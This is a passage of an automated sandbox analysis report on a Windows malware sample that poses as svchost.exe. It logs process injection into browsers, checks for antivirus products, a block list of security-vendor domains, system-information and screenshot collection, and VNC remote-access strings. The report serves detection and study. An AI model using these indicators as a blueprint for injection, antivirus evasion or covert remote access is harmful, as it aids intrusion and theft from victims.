Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C65000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1540000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1541000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1542000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1595000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1050000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1051000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1052000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 10A5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex2_2_026578A0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_013378A0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_013F78A0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex8_2_015278A0
Source: C:\Users\user\Desktop\uavINoSIQh.exeFile opened: CA HIPS KmxAgentJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeFile opened: Agnitum Outpost firewal \pipe\acsipc_serverJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeFile opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csiJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeFile opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.datJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeWindow found: AVP NULL ____AVP.RootJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened: CA HIPS KmxAgentJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened: Agnitum Outpost firewal \pipe\acsipc_serverJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csiJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.datJump to behavior
Source: C:\Windows\apppatch\svchost.exeWindow found: AVP NULL ____AVP.RootJump to behavior
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000000.1726798146.0000000001751000.00000002.00000001.00040000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000000.1728249072.0000000001921000.00000002.00000001.00040000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000008.00000000.1738037608.0000000001941000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
Source: uavINoSIQh.exe, uavINoSIQh.exe, 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, uavINoSIQh.exe, 00000000.00000003.1357318901.0000000000597000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1375813400.0000000002500000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000000.1726798146.0000000001751000.00000002.00000001.00040000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000000.1728249072.0000000001921000.00000002.00000001.00040000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000008.00000000.1738037608.0000000001941000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: uavINoSIQh.exe, 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, uavINoSIQh.exe, 00000000.00000003.1357318901.0000000000597000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1375813400.0000000002500000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comavast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comgoogle.comgoogle.comDnsapi.dllDnsQuery_ADnsQuery_UTF8DnsQuery_WQuery_Mainws2_32.dllgetaddrinfogethostbynameinet_addrqwrtpsdfghjklzxcvbnmeyuioa1676d5775e05c50b46baa5579d4fc7;%s%sMozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)/login.php6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9100016d3ad29879a90b4dd1b4f76e82166ca3T2data.txt\*.*...\ntdll.dllZwQuerySystemInformationGlobal\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}fuckGlobal\HighMemoryEvent_%08xexplorer.exeShell_TrayWnd
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000000.1726798146.0000000001751000.00000002.00000001.00040000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000000.1728249072.0000000001921000.00000002.00000001.00040000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000008.00000000.1738037608.0000000001941000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_00414050 cpuid 0_2_00414050
Source: C:\Windows\apppatch\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\uavINoSIQh.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\8a99a31f\debug_17;Jan;2025_03;54;07.log VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\8a99a31f\scr.bmp VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\8a99a31f\sysinfo.log VolumeInformationJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_00402360 CreateFileA,WriteFile,WriteFile,GetSystemTimeAsFileTime,WriteFile,CloseHandle,0_2_00402360
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_00403A20 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,0_2_00403A20
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02644B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,IsUserAnAdmin,IsUserAnAdmin,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle,2_2_02644B00
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: 0_2_004034C0 GetVersionExA,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,0_2_004034C0
Source: uavINoSIQh.exeBinary or memory string: S:(ML;;NRNWNX;;;LW)

Remote Access Functionality

barindex
Contains VNC / remote desktop functionality (version string found)
Source: uavINoSIQh.exeString found in binary or memory: RFB 003.006
Source: uavINoSIQh.exe, 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: RFB 003.006
Source: uavINoSIQh.exe, 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: $BRFB 003.006
Source: uavINoSIQh.exe, 00000000.00000003.1357318901.0000000000597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: uavINoSIQh.exe, 00000000.00000003.1357318901.0000000000597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exeString found in binary or memory: RFB 003.006
Source: svchost.exeString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000003.1375813400.0000000002500000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000003.1375813400.0000000002500000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.2613697268.00000000026A3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.2613697268.00000000026A3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.2611248672.0000000002450000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.2611248672.0000000002450000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000003.1373943903.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000003.1373943903.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.2611248672.00000000024A6000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.2611248672.00000000024A6000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1860005149.00000000011C0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1860005149.00000000011C0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1873138668.0000000001320000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1873138668.0000000001320000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1835795519.00000000013E0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1835795519.00000000013E0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1832859184.0000000001340000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1832859184.0000000001340000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000008.00000002.1842592106.00000000014B0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000008.00000002.1842592106.00000000014B0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000008.00000002.1844960712.0000000001510000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000008.00000002.1844960712.0000000001510000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1895695128.0000000002D60000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1895695128.0000000002D60000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1889058917.0000000002D00000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1889058917.0000000002D00000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1812866141.0000000002260000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1812866141.0000000002260000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1813283213.00000000022C0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1813283213.00000000022C0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1817738450.0000000002550000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1817738450.0000000002550000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1817233105.00000000024B0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1817233105.00000000024B0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.1820145637.0000000000A50000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.1820145637.0000000000A50000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.1841274589.00000000024A0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.1841274589.00000000024A0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.1854156512.0000000002C70000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000018.00000002.1854156512.0000000002C70000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
